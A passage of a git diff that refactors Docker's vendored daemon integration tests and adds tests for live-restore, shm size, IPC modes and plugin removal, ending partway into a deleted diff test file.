+	expectedOutput = "options timeout:3"
 	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
 }
 
@@ -2549,8 +2450,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) {
 }
 `
 	ioutil.WriteFile(configName, []byte(config), 0644)
-	err = s.d.StartWithBusybox("--config-file", configName)
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c, "--config-file", configName)
 
 	// Run with default runtime
 	out, err := s.d.Cmd("run", "--rm", "busybox", "ls")
@@ -2577,7 +2477,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) {
 }
 `
 	ioutil.WriteFile(configName, []byte(config), 0644)
-	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil)
 	// Give daemon time to reload config
 	<-time.After(1 * time.Second)
 
@@ -2606,11 +2506,12 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) {
 }
 `
 	ioutil.WriteFile(configName, []byte(config), 0644)
-	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil)
 	// Give daemon time to reload config
 	<-time.After(1 * time.Second)
 
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, `file configuration validation failed (runtime name 'runc' is reserved)`)
 
 	// Check that we can select a default runtime
@@ -2631,7 +2532,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) {
 }
 `
 	ioutil.WriteFile(configName, []byte(config), 0644)
-	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil)
 	// Give daemon time to reload config
 	<-time.After(1 * time.Second)
 
@@ -2645,8 +2546,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) {
-	err := s.d.StartWithBusybox("--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager")
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c, "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager")
 
 	// Run with default runtime
 	out, err := s.d.Cmd("run", "--rm", "busybox", "ls")
@@ -2666,9 +2566,8 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) {
 	c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory")
 
 	// Start a daemon without any extra runtimes
-	s.d.Stop()
-	err = s.d.StartWithBusybox()
-	c.Assert(err, check.IsNil)
+	s.d.Stop(c)
+	s.d.StartWithBusybox(c)
 
 	// Run with default runtime
 	out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls")
@@ -2685,17 +2584,16 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) {
 	c.Assert(out, checker.Contains, "Unknown runtime specified oci")
 
 	// Check that we can't override the default runtime
-	s.d.Stop()
-	err = s.d.Start("--add-runtime", "runc=my-runc")
-	c.Assert(err, check.NotNil)
+	s.d.Stop(c)
+	c.Assert(s.d.StartWithError("--add-runtime", "runc=my-runc"), checker.NotNil)
 
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, `runtime name 'runc' is reserved`)
 
 	// Check that we can select a default runtime
-	s.d.Stop()
-	err = s.d.StartWithBusybox("--default-runtime=vm", "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager")
-	c.Assert(err, check.IsNil)
+	s.d.Stop(c)
+	s.d.StartWithBusybox(c, "--default-runtime=vm", "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager")
 
 	out, err = s.d.Cmd("run", "--rm", "busybox", "ls")
 	c.Assert(err, check.NotNil, check.Commentf(out))
@@ -2707,8 +2605,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C) {
-	err := s.d.StartWithBusybox()
-	c.Assert(err, checker.IsNil)
+	s.d.StartWithBusybox(c)
 
 	// top1 will exist after daemon restarts
 	out, err := s.d.Cmd("run", "-d", "--name", "top1", "busybox:latest", "top")
@@ -2722,8 +2619,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C)
 	c.Assert(out, checker.Contains, "top2", check.Commentf("top2 should be running"))
 
 	// now restart daemon gracefully
-	err = s.d.Restart()
-	c.Assert(err, checker.IsNil)
+	s.d.Restart(c)
 
 	out, err = s.d.Cmd("ps", "-a")
 	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
@@ -2732,12 +2628,18 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C)
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) {
-	err := s.d.StartWithBusybox()
-	c.Assert(err, checker.IsNil)
+	s.d.StartWithBusybox(c)
 
 	containerName := "error-values"
 	// Make a container with both a non 0 exit code and an error message
-	out, err := s.d.Cmd("run", "--name", containerName, "busybox", "toto")
+	// We explicitly disable `--init` for this test, because `--init` is enabled by default
+	// on "experimental". Enabling `--init` results in a different behavior; because the "init"
+	// process itself is PID1, the container does not fail on _startup_ (i.e., `docker-init` starting),
+	// but directly after. The exit code of the container is still 127, but the Error Message is not
+	// captured, so `.State.Error` is empty.
+	// See the discussion on https://github.com/docker/docker/pull/30227#issuecomment-274161426,
+	// and https://github.com/docker/docker/pull/26061#r78054578 for more information.
+	out, err := s.d.Cmd("run", "--name", containerName, "--init=false", "busybox", "toto")
 	c.Assert(err, checker.NotNil)
 
 	// Check that those values were saved on disk
@@ -2746,13 +2648,13 @@ func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) {
 	c.Assert(err, checker.IsNil)
 	c.Assert(out, checker.Equals, "127")
 
-	out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName)
-	out = strings.TrimSpace(out)
+	errMsg1, err := s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName)
+	errMsg1 = strings.TrimSpace(errMsg1)
 	c.Assert(err, checker.IsNil)
+	c.Assert(errMsg1, checker.Contains, "executable file not found")
 
 	// now restart daemon
-	err = s.d.Restart()
-	c.Assert(err, checker.IsNil)
+	s.d.Restart(c)
 
 	// Check that those values are still around
 	out, err = s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", containerName)
@@ -2763,86 +2665,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) {
 	out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName)
 	out = strings.TrimSpace(out)
 	c.Assert(err, checker.IsNil)
-}
-
-func (s *DockerDaemonSuite) TestDaemonBackcompatPre17Volumes(c *check.C) {
-	testRequires(c, SameHostDaemon)
-	d := s.d
-	err := d.StartWithBusybox()
-	c.Assert(err, checker.IsNil)
-
-	// hack to be able to side-load a container config
-	out, err := d.Cmd("create", "busybox:latest")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	id := strings.TrimSpace(out)
-
-	out, err = d.Cmd("inspect", "--type=image", "--format={{.ID}}", "busybox:latest")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(d.Stop(), checker.IsNil)
-	<-d.wait
-
-	imageID := strings.TrimSpace(out)
-	volumeID := stringid.GenerateNonCryptoID()
-	vfsPath := filepath.Join(d.root, "vfs", "dir", volumeID)
-	c.Assert(os.MkdirAll(vfsPath, 0755), checker.IsNil)
-
-	config := []byte(`
-		{
-			"ID": "` + id + `",
-			"Name": "hello",
-			"Driver": "` + d.storageDriver + `",
-			"Image": "` + imageID + `",
-			"Config": {"Image": "busybox:latest"},
-			"NetworkSettings": {},
-			"Volumes": {
-				"/bar":"/foo",
-				"/foo": "` + vfsPath + `",
-				"/quux":"/quux"
-			},
-			"VolumesRW": {
-				"/bar": true,
-				"/foo": true,
-				"/quux": false
-			}
-		}
-	`)
-
-	configPath := filepath.Join(d.root, "containers", id, "config.v2.json")
-	err = ioutil.WriteFile(configPath, config, 600)
-	err = d.Start()
-	c.Assert(err, checker.IsNil)
-
-	out, err = d.Cmd("inspect", "--type=container", "--format={{ json .Mounts }}", id)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	type mount struct {
-		Name        string
-		Source      string
-		Destination string
-		Driver      string
-		RW          bool
-	}
-
-	ls := []mount{}
-	err = json.NewDecoder(strings.NewReader(out)).Decode(&ls)
-	c.Assert(err, checker.IsNil)
-
-	expected := []mount{
-		{Source: "/foo", Destination: "/bar", RW: true},
-		{Name: volumeID, Destination: "/foo", RW: true},
-		{Source: "/quux", Destination: "/quux", RW: false},
-	}
-	c.Assert(ls, checker.HasLen, len(expected))
-
-	for _, m := range ls {
-		var matched bool
-		for _, x := range expected {
-			if m.Source == x.Source && m.Destination == x.Destination && m.RW == x.RW || m.Name != x.Name {
-				matched = true
-				break
-			}
-		}
-		c.Assert(matched, checker.True, check.Commentf("did find match for %+v", m))
-	}
+	c.Assert(out, checker.Equals, errMsg1)
 }
 
 func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) {
@@ -2858,17 +2681,17 @@ func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) {
 	c.Assert(cmd.Run(), checker.IsNil)
 
 	// custom one
-	c.Assert(s.d.StartWithBusybox("--userland-proxy-path", newProxyPath), checker.IsNil)
+	s.d.StartWithBusybox(c, "--userland-proxy-path", newProxyPath)
 	out, err := s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	// try with the original one
-	c.Assert(s.d.Restart("--userland-proxy-path", dockerProxyPath), checker.IsNil)
+	s.d.Restart(c, "--userland-proxy-path", dockerProxyPath)
 	out, err = s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	// not exist
-	c.Assert(s.d.Restart("--userland-proxy-path", "/does/not/exist"), checker.IsNil)
+	s.d.Restart(c, "--userland-proxy-path", "/does/not/exist")
 	out, err = s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true")
 	c.Assert(err, checker.NotNil, check.Commentf(out))
 	c.Assert(out, checker.Contains, "driver failed programming external connectivity on endpoint")
@@ -2878,21 +2701,21 @@ func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) {
 // Test case for #22471
 func (s *DockerDaemonSuite) TestDaemonShutdownTimeout(c *check.C) {
 	testRequires(c, SameHostDaemon)
-
-	c.Assert(s.d.StartWithBusybox("--shutdown-timeout=3"), check.IsNil)
+	s.d.StartWithBusybox(c, "--shutdown-timeout=3")
 
 	_, err := s.d.Cmd("run", "-d", "busybox", "top")
 	c.Assert(err, check.IsNil)
 
-	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGINT)
+	c.Assert(s.d.Signal(unix.SIGINT), checker.IsNil)
 
 	select {
-	case <-s.d.wait:
+	case <-s.d.Wait:
 	case <-time.After(5 * time.Second):
 	}
 
-	expectedMessage := `level=debug msg="start clean shutdown of all containers with a 3 seconds timeout..."`
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	expectedMessage := `level=debug msg="daemon configured with a 3 seconds minimum shutdown timeout"`
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, expectedMessage)
 }
 
@@ -2909,7 +2732,7 @@ func (s *DockerDaemonSuite) TestDaemonShutdownTimeoutWithConfigFile(c *check.C)
 	daemonConfig := `{ "shutdown-timeout" : 8 }`
 	fmt.Fprintf(configFile, "%s", daemonConfig)
 	configFile.Close()
-	c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil)
+	s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath))
 
 	configFile, err = os.Create(configFilePath)
 	c.Assert(err, checker.IsNil)
@@ -2917,38 +2740,43 @@ func (s *DockerDaemonSuite) TestDaemonShutdownTimeoutWithConfigFile(c *check.C)
 	fmt.Fprintf(configFile, "%s", daemonConfig)
 	configFile.Close()
 
-	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil)
 
 	select {
-	case <-s.d.wait:
+	case <-s.d.Wait:
 	case <-time.After(3 * time.Second):
 	}
 
 	expectedMessage := `level=debug msg="Reset Shutdown Timeout: 5"`
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, expectedMessage)
 }
 
 // Test case for 29342
 func (s *DockerDaemonSuite) TestExecWithUserAfterLiveRestore(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-	s.d.StartWithBusybox("--live-restore")
+	s.d.StartWithBusybox(c, "--live-restore")
 
-	out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "sh", "-c", "addgroup -S test && adduser -S -G test test -D -s /bin/sh && top")
+	out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "sh", "-c", "addgroup -S test && adduser -S -G test test -D -s /bin/sh && touch /adduser_end && top")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
 
-	s.d.waitRun("top")
+	s.d.WaitRun("top")
+
+	// Wait for shell command to be completed
+	_, err = s.d.Cmd("exec", "top", "sh", "-c", `for i in $(seq 1 5); do if [ -e /adduser_end ]; then rm -f /adduser_end && break; else sleep 1 && false; fi; done`)
+	c.Assert(err, check.IsNil, check.Commentf("Timeout waiting for shell command to be completed"))
 
 	out1, err := s.d.Cmd("exec", "-u", "test", "top", "id")
 	// uid=100(test) gid=101(test) groups=101(test)
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out1))
 
 	// restart daemon.
-	s.d.Restart("--live-restore")
+	s.d.Restart(c, "--live-restore")
 
 	out2, err := s.d.Cmd("exec", "-u", "test", "top", "id")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out2))
-	c.Assert(out1, check.Equals, out2, check.Commentf("Output: before restart '%s', after restart '%s'", out1, out2))
+	c.Assert(out2, check.Equals, out1, check.Commentf("Output: before restart '%s', after restart '%s'", out1, out2))
 
 	out, err = s.d.Cmd("stop", "top")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
@@ -2956,20 +2784,20 @@ func (s *DockerDaemonSuite) TestExecWithUserAfterLiveRestore(c *check.C) {
 
 func (s *DockerDaemonSuite) TestRemoveContainerAfterLiveRestore(c *check.C) {
 	testRequires(c, DaemonIsLinux, overlayFSSupported, SameHostDaemon)
-	s.d.StartWithBusybox("--live-restore", "--storage-driver", "overlay")
+	s.d.StartWithBusybox(c, "--live-restore", "--storage-driver", "overlay")
 	out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "top")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
 
-	s.d.waitRun("top")
+	s.d.WaitRun("top")
 
 	// restart daemon.
-	s.d.Restart("--live-restore", "--storage-driver", "overlay")
+	s.d.Restart(c, "--live-restore", "--storage-driver", "overlay")
 
 	out, err = s.d.Cmd("stop", "top")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
 
 	// test if the rootfs mountpoint still exist
-	mountpoint, err := s.d.inspectFilter("top", ".GraphDriver.Data.MergedDir")
+	mountpoint, err := s.d.InspectField("top", ".GraphDriver.Data.MergedDir")
 	c.Assert(err, check.IsNil)
 	f, err := os.Open("/proc/self/mountinfo")
 	c.Assert(err, check.IsNil)
@@ -2984,5 +2812,320 @@ func (s *DockerDaemonSuite) TestRemoveContainerAfterLiveRestore(c *check.C) {
 
 	out, err = s.d.Cmd("rm", "top")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+}
+
+// #29598
+func (s *DockerDaemonSuite) TestRestartPolicyWithLiveRestore(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	s.d.StartWithBusybox(c, "--live-restore")
+
+	out, err := s.d.Cmd("run", "-d", "--restart", "always", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf("output: %s", out))
+	id := strings.TrimSpace(out)
+
+	type state struct {
+		Running   bool
+		StartedAt time.Time
+	}
+	out, err = s.d.Cmd("inspect", "-f", "{{json .State}}", id)
+	c.Assert(err, checker.IsNil, check.Commentf("output: %s", out))
+
+	var origState state
+	err = json.Unmarshal([]byte(strings.TrimSpace(out)), &origState)
+	c.Assert(err, checker.IsNil)
+
+	s.d.Restart(c, "--live-restore")
+
+	pid, err := s.d.Cmd("inspect", "-f", "{{.State.Pid}}", id)
+	c.Assert(err, check.IsNil)
+	pidint, err := strconv.Atoi(strings.TrimSpace(pid))
+	c.Assert(err, check.IsNil)
+	c.Assert(pidint, checker.GreaterThan, 0)
+	c.Assert(unix.Kill(pidint, unix.SIGKILL), check.IsNil)
+
+	ticker := time.NewTicker(50 * time.Millisecond)
+	timeout := time.After(10 * time.Second)
+
+	for range ticker.C {
+		select {
+		case <-timeout:
+			c.Fatal("timeout waiting for container restart")
+		default:
+		}
+
+		out, err := s.d.Cmd("inspect", "-f", "{{json .State}}", id)
+		c.Assert(err, checker.IsNil, check.Commentf("output: %s", out))
+
+		var newState state
+		err = json.Unmarshal([]byte(strings.TrimSpace(out)), &newState)
+		c.Assert(err, checker.IsNil)
+
+		if !newState.Running {
+			continue
+		}
+		if newState.StartedAt.After(origState.StartedAt) {
+			break
+		}
+	}
+
+	out, err = s.d.Cmd("stop", id)
+	c.Assert(err, check.IsNil, check.Commentf("output: %s", out))
+}
+
+func (s *DockerDaemonSuite) TestShmSize(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	size := 67108864 * 2
+	pattern := regexp.MustCompile(fmt.Sprintf("shm on /dev/shm type tmpfs(.*)size=%dk", size/1024))
+
+	s.d.StartWithBusybox(c, "--default-shm-size", fmt.Sprintf("%v", size))
+
+	name := "shm1"
+	out, err := s.d.Cmd("run", "--name", name, "busybox", "mount")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(pattern.MatchString(out), checker.True)
+	out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.ShmSize}}", name)
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(strings.TrimSpace(out), check.Equals, fmt.Sprintf("%v", size))
+}
+
+func (s *DockerDaemonSuite) TestShmSizeReload(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	configPath, err := ioutil.TempDir("", "test-daemon-shm-size-reload-config")
+	c.Assert(err, checker.IsNil, check.Commentf("could not create temp file for config reload"))
+	defer os.RemoveAll(configPath) // clean up
+	configFile := filepath.Join(configPath, "config.json")
+
+	size := 67108864 * 2
+	configData := []byte(fmt.Sprintf(`{"default-shm-size": "%dM"}`, size/1024/1024))
+	c.Assert(ioutil.WriteFile(configFile, configData, 0666), checker.IsNil, check.Commentf("could not write temp file for config reload"))
+	pattern := regexp.MustCompile(fmt.Sprintf("shm on /dev/shm type tmpfs(.*)size=%dk", size/1024))
+
+	s.d.StartWithBusybox(c, "--config-file", configFile)
+
+	name := "shm1"
+	out, err := s.d.Cmd("run", "--name", name, "busybox", "mount")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(pattern.MatchString(out), checker.True)
+	out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.ShmSize}}", name)
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(strings.TrimSpace(out), check.Equals, fmt.Sprintf("%v", size))
+
+	size = 67108864 * 3
+	configData = []byte(fmt.Sprintf(`{"default-shm-size": "%dM"}`, size/1024/1024))
+	c.Assert(ioutil.WriteFile(configFile, configData, 0666), checker.IsNil, check.Commentf("could not write temp file for config reload"))
+	pattern = regexp.MustCompile(fmt.Sprintf("shm on /dev/shm type tmpfs(.*)size=%dk", size/1024))
+
+	err = s.d.ReloadConfig()
+	c.Assert(err, checker.IsNil, check.Commentf("error reloading daemon config"))
+
+	name = "shm2"
+	out, err = s.d.Cmd("run", "--name", name, "busybox", "mount")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(pattern.MatchString(out), checker.True)
+	out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.ShmSize}}", name)
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(strings.TrimSpace(out), check.Equals, fmt.Sprintf("%v", size))
+}
+
+// this is used to test both "private" and "shareable" daemon default ipc modes
+func testDaemonIpcPrivateShareable(d *daemon.Daemon, c *check.C, mustExist bool) {
+	name := "test-ipcmode"
+	_, err := d.Cmd("run", "-d", "--name", name, "busybox", "top")
+	c.Assert(err, checker.IsNil)
+
+	// get major:minor pair for /dev/shm from container's /proc/self/mountinfo
+	cmd := "awk '($5 == \"/dev/shm\") {printf $3}' /proc/self/mountinfo"
+	mm, err := d.Cmd("exec", "-i", name, "sh", "-c", cmd)
+	c.Assert(err, checker.IsNil)
+	c.Assert(mm, checker.Matches, "^[0-9]+:[0-9]+$")
 
+	exists, err := testIpcCheckDevExists(mm)
+	c.Assert(err, checker.IsNil)
+	c.Logf("[testDaemonIpcPrivateShareable] ipcdev: %v, exists: %v, mustExist: %v\n", mm, exists, mustExist)
+	c.Assert(exists, checker.Equals, mustExist)
+}
+
+// TestDaemonIpcModeShareable checks that --default-ipc-mode shareable works as intended.
+func (s *DockerDaemonSuite) TestDaemonIpcModeShareable(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+
+	s.d.StartWithBusybox(c, "--default-ipc-mode", "shareable")
+	testDaemonIpcPrivateShareable(s.d, c, true)
+}
+
+// TestDaemonIpcModePrivate checks that --default-ipc-mode private works as intended.
+func (s *DockerDaemonSuite) TestDaemonIpcModePrivate(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+
+	s.d.StartWithBusybox(c, "--default-ipc-mode", "private")
+	testDaemonIpcPrivateShareable(s.d, c, false)
+}
+
+// used to check if an IpcMode given in config works as intended
+func testDaemonIpcFromConfig(s *DockerDaemonSuite, c *check.C, mode string, mustExist bool) {
+	f, err := ioutil.TempFile("", "test-daemon-ipc-config")
+	c.Assert(err, checker.IsNil)
+	defer os.Remove(f.Name())
+
+	config := `{"default-ipc-mode": "` + mode + `"}`
+	_, err = f.WriteString(config)
+	c.Assert(f.Close(), checker.IsNil)
+	c.Assert(err, checker.IsNil)
+
+	s.d.StartWithBusybox(c, "--config-file", f.Name())
+	testDaemonIpcPrivateShareable(s.d, c, mustExist)
+}
+
+// TestDaemonIpcModePrivateFromConfig checks that "default-ipc-mode: private" config works as intended.
+func (s *DockerDaemonSuite) TestDaemonIpcModePrivateFromConfig(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	testDaemonIpcFromConfig(s, c, "private", false)
+}
+
+// TestDaemonIpcModeShareableFromConfig checks that "default-ipc-mode: shareable" config works as intended.
+func (s *DockerDaemonSuite) TestDaemonIpcModeShareableFromConfig(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	testDaemonIpcFromConfig(s, c, "shareable", true)
+}
+
+func testDaemonStartIpcMode(c *check.C, from, mode string, valid bool) {
+	d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
+	c.Logf("Checking IpcMode %s set from %s\n", mode, from)
+	var serr error
+	switch from {
+	case "config":
+		f, err := ioutil.TempFile("", "test-daemon-ipc-config")
+		c.Assert(err, checker.IsNil)
+		defer os.Remove(f.Name())
+		config := `{"default-ipc-mode": "` + mode + `"}`
+		_, err = f.WriteString(config)
+		c.Assert(f.Close(), checker.IsNil)
+		c.Assert(err, checker.IsNil)
+
+		serr = d.StartWithError("--config-file", f.Name())
+	case "cli":
+		serr = d.StartWithError("--default-ipc-mode", mode)
+	default:
+		c.Fatalf("testDaemonStartIpcMode: invalid 'from' argument")
+	}
+	if serr == nil {
+		d.Stop(c)
+	}
+
+	if valid {
+		c.Assert(serr, check.IsNil)
+	} else {
+		c.Assert(serr, check.NotNil)
+		icmd.RunCommand("grep", "-E", "IPC .* is (invalid|not supported)", d.LogFileName()).Assert(c, icmd.Success)
+	}
+}
+
+// TestDaemonStartWithIpcModes checks that daemon starts fine given correct
+// arguments for default IPC mode, and bails out with incorrect ones.
+// Both CLI option (--default-ipc-mode) and config parameter are tested.
+func (s *DockerDaemonSuite) TestDaemonStartWithIpcModes(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+
+	ipcModes := []struct {
+		mode  string
+		valid bool
+	}{
+		{"private", true},
+		{"shareable", true},
+
+		{"host", false},
+		{"container:123", false},
+		{"nosuchmode", false},
+	}
+
+	for _, from := range []string{"config", "cli"} {
+		for _, m := range ipcModes {
+			testDaemonStartIpcMode(c, from, m.mode, m.valid)
+		}
+	}
+}
+
+// TestDaemonRestartIpcMode makes sure a container keeps its ipc mode
+// (derived from daemon default) even after the daemon is restarted
+// with a different default ipc mode.
+func (s *DockerDaemonSuite) TestDaemonRestartIpcMode(c *check.C) {
+	f, err := ioutil.TempFile("", "test-daemon-ipc-config-restart")
+	c.Assert(err, checker.IsNil)
+	file := f.Name()
+	defer os.Remove(file)
+	c.Assert(f.Close(), checker.IsNil)
+
+	config := []byte(`{"default-ipc-mode": "private"}`)
+	c.Assert(ioutil.WriteFile(file, config, 0644), checker.IsNil)
+	s.d.StartWithBusybox(c, "--config-file", file)
+
+	// check the container is created with private ipc mode as per daemon default
+	name := "ipc1"
+	_, err = s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	m, err := s.d.InspectField(name, ".HostConfig.IpcMode")
+	c.Assert(err, check.IsNil)
+	c.Assert(m, checker.Equals, "private")
+
+	// restart the daemon with shareable default ipc mode
+	config = []byte(`{"default-ipc-mode": "shareable"}`)
+	c.Assert(ioutil.WriteFile(file, config, 0644), checker.IsNil)
+	s.d.Restart(c, "--config-file", file)
+
+	// check the container is still having private ipc mode
+	m, err = s.d.InspectField(name, ".HostConfig.IpcMode")
+	c.Assert(err, check.IsNil)
+	c.Assert(m, checker.Equals, "private")
+
+	// check a new container is created with shareable ipc mode as per new daemon default
+	name = "ipc2"
+	_, err = s.d.Cmd("run", "-d", "--name", name, "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	m, err = s.d.InspectField(name, ".HostConfig.IpcMode")
+	c.Assert(err, check.IsNil)
+	c.Assert(m, checker.Equals, "shareable")
+}
+
+// TestFailedPluginRemove makes sure that a failed plugin remove does not block
+// the daemon from starting
+func (s *DockerDaemonSuite) TestFailedPluginRemove(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, SameHostDaemon)
+	d := daemon.New(c, dockerBinary, dockerdBinary)
+	d.Start(c)
+	cli, err := client.NewClient(d.Sock(), api.DefaultVersion, nil, nil)
+	c.Assert(err, checker.IsNil)
+
+	ctx, cancel := context.WithTimeout(context.Background(), 300*time.Second)
+	defer cancel()
+
+	name := "test-plugin-rm-fail"
+	out, err := cli.PluginInstall(ctx, name, types.PluginInstallOptions{
+		Disabled:             true,
+		AcceptAllPermissions: true,
+		RemoteRef:            "cpuguy83/docker-logdriver-test",
+	})
+	c.Assert(err, checker.IsNil)
+	defer out.Close()
+	io.Copy(ioutil.Discard, out)
+
+	ctx, cancel = context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancel()
+	p, _, err := cli.PluginInspectWithRaw(ctx, name)
+	c.Assert(err, checker.IsNil)
+
+	// simulate a bad/partial removal by removing the plugin config.
+	configPath := filepath.Join(d.Root, "plugins", p.ID, "config.json")
+	c.Assert(os.Remove(configPath), checker.IsNil)
+
+	d.Restart(c)
+	ctx, cancel = context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancel()
+	_, err = cli.Ping(ctx)
+	c.Assert(err, checker.IsNil)
+
+	_, _, err = cli.PluginInspectWithRaw(ctx, name)
+	// plugin should be gone since the config.json is gone
+	c.Assert(err, checker.NotNil)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go
deleted file mode 100644
index 08cf6e1caa..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go
+++ /dev/null
@@ -1,98 +0,0 @@
-package main
-
-import (
-	"strings"
-	"time"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-// ensure that an added file shows up in docker diff
-func (s *DockerSuite) TestDiffFilenameShownInOutput(c *check.C) {
-	containerCmd := `mkdir /foo; echo xyzzy > /foo/bar`
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd)
-
-	// Wait for it to exit as cannot diff a running container on Windows, and
-	// it will take a few seconds to exit. Also there's no way in Windows to
-	// differentiate between an Add or a Modify, and all files are under
-	// a "Files/" prefix.
-	containerID := strings.TrimSpace(out)
-	lookingFor := "A /foo/bar"
-	if daemonPlatform == "windows" {
-		err := waitExited(containerID, 60*time.Second)
